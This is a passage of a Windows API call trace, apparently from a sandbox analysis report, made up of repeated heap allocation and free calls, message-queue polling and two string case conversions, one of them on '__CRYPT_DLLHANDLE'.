hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f28 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9787c0 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0269.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0269.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0269.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0269.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0269.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0269.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0269.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0269.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0269.222] CharLowerBuffW (in: lpsz="byte[384]", cchLength=0x9 | out: lpsz="byte[384]") returned 0x9 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0269.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0269.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0269.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0269.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0269.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x180) returned 0x2e558d8 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0269.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0269.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0269.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0269.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x2e55a60 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x2e55be8 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a60 | out: hHeap=0x970000) returned 1 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0269.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55be8 | out: hHeap=0x970000) returned 1 [0269.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0269.225] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d78 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0269.225] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0269.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0269.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0269.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0269.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0269.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0269.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0269.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0269.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0269.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0269.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0269.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0269.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x2e55a60 [0269.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a60 | out: hHeap=0x970000) returned 1 [0269.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x9787c0 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52150 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52150 | out: hHeap=0x970000) returned 1 [0269.228] HeapFree (in: hHeap=0x970000, 